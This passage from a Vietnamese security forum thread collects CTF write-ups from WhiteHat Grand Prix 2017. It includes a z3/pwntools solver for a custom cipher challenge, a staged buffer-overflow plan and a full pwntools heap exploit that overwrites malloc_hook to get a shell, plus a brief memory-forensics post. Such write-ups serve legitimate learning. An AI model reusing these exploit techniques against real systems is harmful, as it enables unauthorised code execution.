     0xc910abaf, 0xd28b2b2f, 0x78747e7a, 0xc31faeaa, 0xb5529591, 0xa3f4743,
     0x1a274f4b, 0x7a777f7b, 0xfcb23c38, 0x62637377, 0x26055155, 0xd68d292d,
     0xf134b7b3, 0xd307a6a2, 0x2d86d9dd, 0xaacf1713, 0x57c1e4e0, 0x5fcde0e4,
     0xbd5e9195, 0x9ce20c08, 0xbb5b9296, 0xe52abdb9, 0x304246, 0xb4de181c,
     0x6fe5f8fc, 0xdf0da0a4, 0xf2bb3b3f, 0x2789dcd8, 0xb6dd191d, 0xc2932327,
     0x9d6e8185, 0xa14c9f9b, 0xa4c61014, 0x9ae70f0b, 0x2980dbdf, 0x7e717d79,
     0x1bccfcb, 0x9ee10d09, 0x24065054, 0x321b5b5f, 0x564d696d, 0x3998d3d7,
     0x1daec1c5, 0xf938b3b7, 0xa54a9d99, 0xcf15a8ac, 0x86f50105, 0x50486a6e,
     0xf8b43e3a, 0xfb5c8cc, 0x63effefa, 0x61ecfffb, 0x8ef90501, 0x122b4b4f,
     0x1fadc0c4, 0xa2c31317, 0xfeb13d39, 0x686c7672, 0x99688387, 0x727b7b7f,
     0xacca1410, 0x4364044, 0xc0902226, 0x7b9ccc8, 0x79f8f3f7, 0xf731b4b0,
     0x544e686c, 0x49d0ebef, 0xb7519490, 0x857a8d89, 0x45daede9, 0x4c5a6460,
     0xbcd21c18, 0xc719aca8, 0x69e0fbff, 0x5dcee1e5, 0x43dfeeea, 0x524b6b6f,
     0x7bfbf2f6, 0xa7499c98, 0xe920bbbf, 0xc4962024, 0x3e115d59, 0xcb13aaae,
     0x6de6f9fd, 0x3791d4d0, 0x67e9fcf8, 0x747e787c, 0xbb3cace, 0xb9589397,
     0xeaaf3733, 0xbed11d19, 0xecaa3430, 0x47d9ece8, 0x341e585c, 0x70787a7e,
     0x15a2c5c1, 0xc6952125, 0x3bfceca, 0x42536367]]
  
  
  def permute(src):
    w0 = struct.unpack("I", bytearray(src[0:4]))[0]
    w1 = struct.unpack("I", bytearray(src[4:8]))[0]
    w2 = struct.unpack("I", bytearray(src[8:12]))[0]
    w3 = struct.unpack("I", bytearray(src[12:16]))[0]
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][4]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][5]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][6]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][7]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][8]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][9]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][10]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][11]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][12]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][13]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][14]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][15]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][16]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][17]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][18]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][19]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][20]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][21]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][22]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][23]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][24]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][25]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][26]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][27]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][28]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][29]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][30]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][31]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][32]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][33]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][34]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][35]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = ((tbl[1][((w0) & 0xff)] ^ tbl[2][(((w1) >> 8) & 0xff)] ^ tbl[3][(
      ((w2) >> 16) & 0xff)] ^ tbl[5][(((w3) >> 24) & 0xff)]) ^ (tbl[4][36]))
    t1 = ((tbl[1][((w1) & 0xff)] ^ tbl[2][(((w2) >> 8) & 0xff)] ^ tbl[3][(
      ((w3) >> 16) & 0xff)] ^ tbl[5][(((w0) >> 24) & 0xff)]) ^ (tbl[4][37]))
    t2 = ((tbl[1][((w2) & 0xff)] ^ tbl[2][(((w3) >> 8) & 0xff)] ^ tbl[3][(
      ((w0) >> 16) & 0xff)] ^ tbl[5][(((w1) >> 24) & 0xff)]) ^ (tbl[4][38]))
    t3 = ((tbl[1][((w3) & 0xff)] ^ tbl[2][(((w0) >> 8) & 0xff)] ^ tbl[3][(
      ((w1) >> 16) & 0xff)] ^ tbl[5][(((w2) >> 24) & 0xff)]) ^ (tbl[4][39]))
    w0 = t0
    w1 = t1
    w2 = t2
    w3 = t3
    t0 = (((tbl[0][((w0) & 0xff)]) | ((tbl[0][(((w1) >> 8) & 0xff)]) << 8) | ((
      tbl[0][(((w2) >> 16) & 0xff)]) << 16) | ((tbl[0][(((w3) >> 24) & 0xff)]) << 24)) ^ (tbl[4][40]))
    t1 = (((tbl[0][((w1) & 0xff)]) | ((tbl[0][(((w2) >> 8) & 0xff)]) << 8) | ((
      tbl[0][(((w3) >> 16) & 0xff)]) << 16) | ((tbl[0][(((w0) >> 24) & 0xff)]) << 24)) ^ (tbl[4][41]))
    t2 = (((tbl[0][((w2) & 0xff)]) | ((tbl[0][(((w3) >> 8) & 0xff)]) << 8) | ((
      tbl[0][(((w0) >> 16) & 0xff)]) << 16) | ((tbl[0][(((w1) >> 24) & 0xff)]) << 24)) ^ (tbl[4][42]))
    t3 = (((tbl[0][((w3) & 0xff)]) | ((tbl[0][(((w0) >> 8) & 0xff)]) << 8) | ((
      tbl[0][(((w1) >> 16) & 0xff)]) << 16) | ((tbl[0][(((w2) >> 24) & 0xff)]) << 24)) ^ (tbl[4][43]))
    cipher = ([(t0 >> i & 0xff) for i in (0, 8, 16, 24)] +
         [(t1 >> i & 0xff) for i in (0, 8, 16, 24)] +
         [(t2 >> i & 0xff) for i in (0, 8, 16, 24)] +
         [(t3 >> i & 0xff) for i in (0, 8, 16, 24)])
  
    return cipher
  
  
  def xor(a, b):
    assert len(a) == len(b)
    return [x[0] ^ x[1] for x in zip(a, b)]
  
  
  names = [
    "Việt Nam",
    "Đại Nam",
    "Đại Việt",
    "Đại Cồ Việt",
    "Vạn Xuân",
    "Lĩnh Nam",
    "Âu Lạc",
    "Văn Lang",
  ]
  
  
  def vn_x931():
    seed = struct.unpack("<16B", bytearray(os.urandom(16)))
    v = seed
    s = []
    for name in reversed(names):
      trucated = hashlib.sha256(name).hexdigest()[0:32]
      t = permute(map(ord, trucated.decode('hex')))
      r = permute(xor(t, v))
      v = permute(xor(t, r))
      print(binascii.hexlify(bytearray(r)))
      s.append(binascii.hexlify(bytearray(r)))
    return s[0:-1], s[-1]
   
  solve_xor.py

  Mã:
  from z3 import *
  from ciphers import tbl
  
  def solve_xor(val):
    a = BitVec('a', 32)
    b = BitVec('b', 32)
    c = BitVec('c', 32)
    d = BitVec('d', 32)
    s = Solver()
    s.add(a ^ b ^ c ^ d == val)
  
    def add_all(var, arr):
      clause = False
      for x in arr:
        clause = Or(var == x, clause)
      return clause
  
    s.add(add_all(a, tbl[1]))
    s.add(add_all(b, tbl[2]))
    s.add(add_all(c, tbl[3]))
    s.add(add_all(d, tbl[5]))
  
    assert(s.check() == sat)
    return [s.model()[a].as_long(), s.model()[b].as_long(), s.model()[c].as_long(), s.model()[d].as_long()]
  
  val = int(sys.argv[1])
  print solve_xor(val)
  Vn_x9.31_solve.py

  Mã:
  import struct
  from z3 import *
  from pwn import *
  from ciphers import tbl, names, permute, xor
  import hashlib
  import binascii
  import os
  
  tbl_rev = [{} for i in range(6)]
  for i in range(6):
    if i == 4:
      continue
    for j in range(256):
      tbl_rev[i][tbl[i][j]] = j
  
  def solve_xor_parallel(val1, val2, val3, val4):
    a = os.popen("python solve_xor.py {}".format(val1))
    b = os.popen("python solve_xor.py {}".format(val2))
    c = os.popen("python solve_xor.py {}".format(val3))
    d = os.popen("python solve_xor.py {}".format(val4))
  
    return [eval(a.read()), eval(b.read()), eval(c.read()), eval(d.read())]
  
  def permute_rev(src):
    t0 = struct.unpack("I", bytearray(src[0:4]))[0] ^ tbl[4][40]
    t1 = struct.unpack("I", bytearray(src[4:8]))[0] ^ tbl[4][41]
    t2 = struct.unpack("I", bytearray(src[8:12]))[0] ^ tbl[4][42]
    t3 = struct.unpack("I", bytearray(src[12:16]))[0] ^ tbl[4][43]
  
    w0 = (tbl_rev[0][t0 & 0xff]) | (tbl_rev[0][(t3 >> 8) & 0xff] << 8) | (tbl_rev[0][(t2 >> 16) & 0xff] << 16) | (tbl_rev[0][(t1 >> 24) & 0xff] << 24)
    w1 = (tbl_rev[0][t1 & 0xff]) | (tbl_rev[0][(t0 >> 8) & 0xff] << 8) | (tbl_rev[0][(t3 >> 16) & 0xff] << 16) | (tbl_rev[0][(t2 >> 24) & 0xff] << 24)
    w2 = (tbl_rev[0][t2 & 0xff]) | (tbl_rev[0][(t1 >> 8) & 0xff] << 8) | (tbl_rev[0][(t0 >> 16) & 0xff] << 16) | (tbl_rev[0][(t3 >> 24) & 0xff] << 24)
    w3 = (tbl_rev[0][t3 & 0xff]) | (tbl_rev[0][(t2 >> 8) & 0xff] << 8) | (tbl_rev[0][(t1 >> 16) & 0xff] << 16) | (tbl_rev[0][(t0 >> 24) & 0xff] << 24)
  
    for i in range(9):
      t0 = w0 ^ tbl[4][36-i*4]
      t1 = w1 ^ tbl[4][36-i*4+1]
      t2 = w2 ^ tbl[4][36-i*4+2]
      t3 = w3 ^ tbl[4][36-i*4+3]
  
      grid = solve_xor_parallel(t0, t1, t2, t3)
  
      w0 = (tbl_rev[1][grid[0][0]]) | (tbl_rev[2][grid[3][1]] << 8) | (tbl_rev[3][grid[2][2]] << 16) | (tbl_rev[5][grid[1][3]] << 24)
      w1 = (tbl_rev[1][grid[1][0]]) | (tbl_rev[2][grid[0][1]] << 8) | (tbl_rev[3][grid[3][2]] << 16) | (tbl_rev[5][grid[2][3]] << 24)
      w2 = (tbl_rev[1][grid[2][0]]) | (tbl_rev[2][grid[1][1]] << 8) | (tbl_rev[3][grid[0][2]] << 16) | (tbl_rev[5][grid[3][3]] << 24)
      w3 = (tbl_rev[1][grid[3][0]]) | (tbl_rev[2][grid[2][1]] << 8) | (tbl_rev[3][grid[1][2]] << 16) | (tbl_rev[5][grid[0][3]] << 24)
  
    cipher = ([(w0 >> i & 0xff) for i in (0, 8, 16, 24)] +
         [(w1 >> i & 0xff) for i in (0, 8, 16, 24)] +
         [(w2 >> i & 0xff) for i in (0, 8, 16, 24)] +
         [(w3 >> i & 0xff) for i in (0, 8, 16, 24)])
  
    return cipher
  
  if __name__ == "__main__":
    # proc = remote('localhost', 8888)
    proc = remote('vn-x931.grandprix.whitehatvn.com', 8888)
  
    proc.recvline()
    init = proc.recvline().split()[7]
    print init
  
    r = [ord(x) for x in init.decode('hex')]
    trucated = hashlib.sha256(names[0]).hexdigest()[0:32]
    t = permute(map(ord, trucated.decode('hex')))
    v = xor(permute_rev(r), t)
  
    for name in names[1:]:
      trucated = hashlib.sha256(name).hexdigest()[0:32]
      t = permute(map(ord, trucated.decode('hex')))
      r = xor(permute_rev(v), t)
      r_str = binascii.hexlify(bytearray(r))
      print r_str
  
      proc.recvline()
      proc.sendline(r_str)
      print proc.recvline()
  
      v = xor(permute_rev(r), t)
  
    print proc.recvall()
  
  # D0n'T_Uz3_H4rD_k0d3d_Keyz
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 4. whf

  whf Super Moderator Thành viên BQT

  Tham gia: 06/07/13, 03:07 AM
  Bài viết: 1,183
  Đã được thích: 764
  Điểm thành tích:
  113
  Whitehat 2017 - Shellcode_revenge++

  I only managed to play one challenge in this CTF. The challenge was obviously trying to get you to write alpha numeric 64bit shellcode.

  Generally I enjoy these shellcode challenges when I have plenty of time to play. During the CTF I didn't have much time available.

  Usually one of the first things I'll look at doing is writing just enough shellcode to do another read() so that I can bypass the filters.

  But even that sounded tedious. So I started looking for a way to bypass the shellcoding part of it altogether, after a bit of digging I managed to come up with a way.

  Description of attack:
  This utilizes a 3 stage payload.

  1. Utilize the BOF which will only allow you overwrite the return address (no more than that, so ROP is limited)
  • This is meant to allow you to jump to the shellcode
  1. Instead overwrite the RBP and return pointer, and return to section of code that does a read()
  • Since it's reading to a location relative to RBP, it's now getting read into BSS executable memory.
  • We are still limited in length
  1. Write just enough shellcode (no filters) to be able to do yet another read with much more buffer
  2. Jump to this small section of shellcode
  3. Read in a much larger section of shellcode, no restrictions other than newline.
  4. Exectute newly uploaded shellcode
  5. Profit
  exploit.py
  upload_2017-12-23_10-22-41.png

   
  Chỉnh sửa cuối: 23/12/17, 12:12 PM
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 5. whf

  whf Super Moderator Thành viên BQT

  Tham gia: 06/07/13, 03:07 AM
  Bài viết: 1,183
  Đã được thích: 764
  Điểm thành tích:
  113
  1. Fastbin Attack to be able to overwrite sizes[] and chunks[] array.
  2. Use 1) to overwrite chunk ptrs to leak libc and heap
  3. Overwrite a chunk ptr w/ malloc_hook
  4. Overwrite malloc_hook w/one_shot
  5. Trigger memory corruption
  Mã:
  #!/usr/bin/env python
  
  from pwn import *
  import sys
  
  def addChunk(size, content):
    r.sendlineafter("choice:", "1")
    r.sendlineafter("of chunk:", str(size))
    r.sendafter("the chunk:", content)
  
  def editChunk(idx, content):
    r.sendlineafter("choice:", "2")
    r.sendlineafter("Index:", str(idx))
    r.sendafter("the chunk:", content)
  
  def showChunk(idx):
    r.sendlineafter("choice:", "3")
    r.sendlineafter("Index:", str(idx))
    return r.recvuntil("---")
  
  def information(change, name):
    r.sendlineafter("choice:", "4")
    r.sendlineafter("0.no)", str(change))
    if change:
      r.sendafter("name:", name)
  
  def exit():
    r.sendlineafter("choice:", "5")
  
  def exploit(r):
    name = "A"
    r.sendlineafter("name?", name)
    
    age = 1337
    r.sendlineafter("age?", str(age))
  
    information(1, "A"*0x21)
    information(1, "\0")
    information(8, p64(0x602080)) # fake FD ptr
    
    addChunk(0x21, "B")
    addChunk(0x31, "C")
    addChunk(0x28, p64(0xb00bface)*5) # fake sizes
    
    payload = p64(0xb00bface)*14 # fake sizes
    payload += p64(0x602020)     # for libc leak
    payload += p64(0x602050)     # for heap leak
    payload += p64(0x602100)     # for easy access to overwrite chunks
    
    editChunk(2,payload)
  
    libc_base = u64(showChunk(0)[0:6].ljust(8,'\0'))-0x3c5620
    heap_base = u64(showChunk(1)[0:3].ljust(8,'\0'))-0x10
    malloc_hook = libc_base+0x3c4b10
    one_shot = libc_base+0xf0274
  
    log.success("libc_base found at "+hex(libc_base))
    log.success("heap_base found at "+hex(heap_base))
    log.success("malloc_hook found at "+hex(malloc_hook))
    log.success("one_shot found at "+hex(one_shot))
    
    editChunk(2, p64(malloc_hook))
    editChunk(0, p64(one_shot))
   
    information(1, "\0")
    information(1, "\0")
    
    r.interactive()
  
  if __name__ == "__main__":
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
      r = remote(sys.argv[1], int(sys.argv[2]))
      exploit(r)
    else:
      #r = process(['/home/vagrant/CTFs/whitehatctf17/free/free'], env={"LD_PRELOAD":""})
      r = process(['/home/vagrant/CTFs/whitehatctf17/free/free'], env={"LD_PRELOAD":"./libc.so.6"})
      print util.proc.pidof(r)
      pause()
      exploit(r)
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 6. krone

  krone VIP Members

  Tham gia: 26/07/16, 03:07 PM
  Bài viết: 260
  Đã được thích: 138
  Điểm thành tích:
  43
  ReUTD đóng góp thêm write up cho bài OTP: Link
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  sunny thích bài này.
 7. nQg

  nQg W-------

  Tham gia: 05/01/15, 03:01 PM
  Bài viết: 25
  Đã được thích: 14
  Điểm thành tích:
  18
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 8. nQg

  nQg W-------

  Tham gia: 05/01/15, 03:01 PM
  Bài viết: 25
  Đã được thích: 14
  Điểm thành tích:
  18
  For200 - Dark Templar:

  [​IMG]
  Chúng ta được cung cấp một file raw. Thường thường những dạng bài như thế này thì cách giải quyết sẽ là scan bằng volatility, check pslist, cmd, filescan,... bla bla. Nhưng trường hợp này thì không cần phức tạp đến vậy, suy nghĩ đơn giản, mình sẽ tìm kiếm chuỗi darktemplar.com như trong đề bài, với hy vọng sẽ có được vài thông tin hữu ích.

  [​IMG]
  Ok có một địa chỉ IP. Truy cập vào và...
  [​IMG]
  Cám ơn BTC, 200 điểm chưa bao giờ dễ lấy đến thế.
   

  Các file đính kèm:

  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  sunny and whf like this.
 9. AceBear

  AceBear Member

  Tham gia: 25/10/17, 11:10 AM
  Bài viết: 7
  Đã được thích: 10
  Điểm thành tích:
  3
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  tmnt53 and krone like this.
 10. AceBear

  AceBear Member

  Tham gia: 25/10/17, 11:10 AM
  Bài viết: 7
  Đã được thích: 10
  Điểm thành tích:
  3
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  tmnt53, sunny and whf like this.
 11. sunny

  sunny VIP Members

  Tham gia: 30/06/14, 10:06 PM
  Bài viết: 1,834
  Đã được thích: 862
  Điểm thành tích:
  113
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 12. Bkis Hunter

  Bkis Hunter Active Member

  Tham gia: 30/12/17, 06:12 PM
  Bài viết: 43
  Đã được thích: 3
  Điểm thành tích:
  8
  Sao 103.237.98.28 lại xuất hiện 3 lần???


  [​IMG]
  Chúng ta được cung cấp một file raw. Thường thường những dạng bài như thế này thì cách giải quyết sẽ là scan bằng volatility, check pslist, cmd, filescan,... bla bla. Nhưng trường hợp này thì không cần phức tạp đến vậy, suy nghĩ đơn giản, mình sẽ tìm kiếm chuỗi darktemplar.com như trong đề bài, với hy vọng sẽ có được vài thông tin hữu ích.

  [​IMG]
  Ok có một địa chỉ IP. Truy cập vào và...
  [​IMG]
  Cám ơn BTC, 200 điểm chưa bao giờ dễ lấy đến thế.[/QUOTE]
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 13. Bkis Hunter

  Bkis Hunter Active Member

  Tham gia: 30/12/17, 06:12 PM
  Bài viết: 43
  Đã được thích: 3
  Điểm thành tích:
  8
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
 14. nQg

  nQg W-------

  Tham gia: 05/01/15, 03:01 PM
  Bài viết: 25
  Đã được thích: 14
  Điểm thành tích:
  18
  Cho dù có 3 4 hay 5 lần thì cũng chẳng có ý nghĩa gì, chắc hỏi BTC thôi chứ mình chả biết =)))))))

  "Thi CTF thì flag là ưu tiên hàng đầu, mọi thứ khác không quan trọng."​
   
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  sunny thích bài này.
 15. tmnt53

  tmnt53 VIP Members

  Tham gia: 25/04/15, 09:04 AM
  Bài viết: 127
  Đã được thích: 98
  Điểm thành tích:
  28
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  sunny thích bài này.
 1. WhiteHat Team
 2. WhiteHat Team
 3. WhiteHat Team
 4. WhiteHat News #ID:2018
 5. tuantran